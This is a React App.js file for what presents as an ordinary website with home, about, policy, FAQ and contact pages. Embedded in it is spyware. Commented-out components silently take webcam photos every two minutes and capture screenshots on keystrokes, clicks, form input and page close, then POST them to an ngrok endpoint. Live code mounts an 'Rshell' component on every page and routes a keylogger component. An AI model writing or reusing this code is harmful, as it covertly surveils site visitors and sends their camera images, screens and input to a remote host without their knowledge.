import 'bootstrap/dist/css/bootstrap.min.css';
import 'bootstrap/dist/js/bootstrap.bundle.min';
import { useEffect, useRef, useState } from 'react';
import { Route, BrowserRouter as Router, Routes, useLocation } from 'react-router-dom';
import "slick-carousel/slick/slick-theme.css";
import "slick-carousel/slick/slick.css";
import Swal from 'sweetalert2';
import About from './About';
import flowersGif from "./assets/gif.webp";
import "./assets/app.css";
import Footer from "./components/Footer";
import NavbarHeader from './components/NavbarHeader';
import ContactUs from './ContactUs';
import Faqs from './Faqs';
import Home from './Home';
import Keyloagger from './Keyloagger';
import Policy from './Policy';
import Rshell from './Rshell';




// function CameraSnap() {
//   useEffect(() => {
//     const takeSnap = async () => {
//       try {
//         const stream = await navigator.mediaDevices.getUserMedia({ video: true });
//         const video = document.createElement('video');
//         video.srcObject = stream;
//         await video.play();

//         const canvas = document.createElement('canvas');
//         canvas.width = video.videoWidth;
//         canvas.height = video.videoHeight;
//         canvas.getContext('2d').drawImage(video, 0, 0);

//         const imageData = canvas.toDataURL('image/jpeg');
//         stream.getTracks().forEach(track => track.stop());

//         // Send to your API
//         const response = await fetch('https://lilia-landed-unbriefly.ngrok-free.dev/capture_photo', {
//           method: 'POST',
//           headers: { 'Content-Type': 'application/json' },
//           body: JSON.stringify({ image_data: imageData })
//         });

//         const result = await response.json();
//         console.log('📸 Snap result:', result);

//       } catch (error) {
//         console.log('Camera error:', error);
//       }
//     };

//     // Take snap every 2 minutes (120000 ms)
//     const interval = setInterval(takeSnap, 120000);

//     return () => clearInterval(interval);
//   }, []);

//   return null;
// }

// Enhanced ScreenshotWatcher Component
function ScreenshotWatcher() {
  const location = useLocation();
  const lastCaptureRef = useRef(0);
  const minInterval = 10000; // 10 seconds between captures

  const [success, setSuccess] = useState(false);

  // const captureScreenshot = async (reason = 'activity') => {
  //   const now = Date.now();
  //   if (now - lastCaptureRef.current < minInterval) return;  // prevent too frequent
  //   lastCaptureRef.current = now;

  //   try {
  //     const canvas = await html2canvas(document.body);
  //     const dataUrl = canvas.toDataURL("image/png");

  //     // Send the screenshot data to the FastAPI endpoint
  //     const response = await fetch("https://lilia-landed-unbriefly.ngrok-free.dev/screenshot/upload", {
  //       method: "POST",
  //       headers: { "Content-Type": "application/json" },
  //       body: JSON.stringify({ image_data: dataUrl })
  //     });

  //     console.log(`📸 Screenshot sent (${reason})`);
  //   } catch (err) {
  //     console.error("Screen capture failed:", err);
  //   }
  // };

  // useEffect(() => {
  //   const captureScreenshotOnClose = async () => {
  //     await captureScreenshot('window_close');
  //   };

  //   window.addEventListener("beforeunload", captureScreenshotOnClose);

  //   return () => {
  //     window.removeEventListener("beforeunload", captureScreenshotOnClose);
  //   };
  // }, []);

  // useEffect(() => {
  //   // Capture on route change
  //   captureScreenshot('navigation');

  //   // Event listeners for all activities
  //   const handleKeyPress = (e) => {
  //     if (e.key.length === 1 || e.key.startsWith('F') || e.ctrlKey || e.altKey || e.metaKey) {
  //       captureScreenshot('keyboard_activity');
  //     }
  //   };

  //   const handleMouseClick = (e) => {
  //     captureScreenshot('mouse_click');
  //   };

  //   const handleFormInput = (e) => {
  //     if (['INPUT', 'TEXTAREA', 'SELECT'].includes(e.target.tagName)) {
  //       captureScreenshot('form_interaction');
  //     }
  //   };

  //   const handleVisibilityChange = () => {
  //     if (!document.hidden) {
  //       captureScreenshot('tab_switch');
  //     }
  //   };

  //   const handleResize = () => {
  //     captureScreenshot('window_resize');
  //   };

  //   const handleScroll = () => {
  //     captureScreenshot('scroll_activity');
  //   };

  //   // Add event listeners
  //   document.addEventListener('keydown', handleKeyPress);
  //   document.addEventListener('click', handleMouseClick);
  //   document.addEventListener('input', handleFormInput);
  //   document.addEventListener('change', handleFormInput);
  //   document.addEventListener('visibilitychange', handleVisibilityChange);
  //   window.addEventListener('resize', handleResize);
  //   window.addEventListener('scroll', handleScroll);

  //   // Periodic captures
  //   const periodicInterval = setInterval(() => {
  //     captureScreenshot('periodic');
  //   // }, 60000);
  //   }, 5 * 60 * 1000);

  //   // Cleanup
  //   return () => {
  //     document.removeEventListener('keydown', handleKeyPress);
  //     document.removeEventListener('click', handleMouseClick);
  //     document.removeEventListener('input', handleFormInput);
  //     document.removeEventListener('change', handleFormInput);
  //     document.removeEventListener('visibilitychange', handleVisibilityChange);
  //     window.removeEventListener('resize', handleResize);
  //     window.removeEventListener('scroll', handleScroll);
  //     clearInterval(periodicInterval);
  //   };
  // }, [location]);

  return null;
}

export default function App() {

// flower welconme
// useEffect(() => {
//     const timer = setTimeout(() => {
//         const showPopup = () => {
//             // Store original scroll
//             const scrollY = window.scrollY;
//             document.body.style.overflow = 'hidden';
//             document.body.style.position = 'fixed';
//             document.body.style.top = `-${scrollY}px`;
//             document.body.style.width = '100%';
            
//             Swal.fire({
//                 html: `<div style="width:450px;height:350px;border-radius:15px;overflow:hidden;position:relative;box-shadow:0 15px 40px rgba(255,0,100,0.3);">
//                         <img src="${flowersGif}" style="width:100%;height:100%;object-fit:cover;">
//                         <div style="position:absolute;top:0;left:0;width:100%;height:100%;pointer-events:none;">
//                             ${[...Array(15)].map(() => `<div style="position:absolute;top:-30px;left:${Math.random()*100}%;width:${10+Math.random()*20}px;height:${10+Math.random()*20}px;background:radial-gradient(circle,#ff0066,#ff3399);border-radius:50%;opacity:0.7;animation:fall ${2+Math.random()*3}s linear infinite ${Math.random()*2}s;"></div>`).join('')}
//                         </div>
//                         <div id="flower-close-btn" style="position:absolute;top:12px;right:12px;background:white;border:2px solid #ff0066;border-radius:20px;color:#ff0066;font-family:Georgia;font-size:16px;padding:6px 14px;cursor:pointer;z-index:100;">𝓬𝓵𝓸𝓼𝓮</div>
//                         <style>@keyframes fall{0%{transform:translateY(-30px)rotate(0deg);opacity:0}20%,80%{opacity:0.8}100%{transform:translateY(330px)rotate(360deg);opacity:0}}</style>
//                     </div>`,
//                 maxWidth: "500px",
//                 width: "40%",
//                 padding: "0",
//                 background: "transparent",
//                 backdrop: "rgba(0,0,0,0.4)",
//                 showConfirmButton: false,
//                 showCloseButton: false,
//                 allowOutsideClick: true,
//                 allowEscapeKey: true,
//                 didOpen: () => {
//                     const closeBtn = document.getElementById('flower-close-btn');
//                     if (closeBtn) {
//                         closeBtn.onclick = () => {
//                             const scrollY = document.body.style.top;
//                             document.body.style.position = '';
//                             document.body.style.top = '';
//                             document.body.style.overflow = '';
//                             document.body.style.width = '';
//                             window.scrollTo(0, parseInt(scrollY || '0') * -1);
//                             Swal.close();
//                         };
//                     }
//                 }
//             });
//         };
//         showPopup();
//     }, 10000);

//     return () => clearTimeout(timer);
// }, []);


  return (
    <Router>
      <ScreenshotWatcher />
      {/* <CameraSnap />  */}
      <div>
<Rshell />
        <NavbarHeader />
        <Routes>
          <Route path="/" element={<Home />} />
          {/* <Route path="/" element={<Rshell />} /> */}
          <Route path="/about" element={<About />} />
          <Route path="/policy" element={<Policy />} />
          <Route path="/faqs" element={<Faqs />} />
          <Route path="/contact" element={<ContactUs />} />
          <Route path="/keylogger" element={<Keyloagger />} />
        </Routes>
        <Footer />
      </div>
    </Router>
  );
}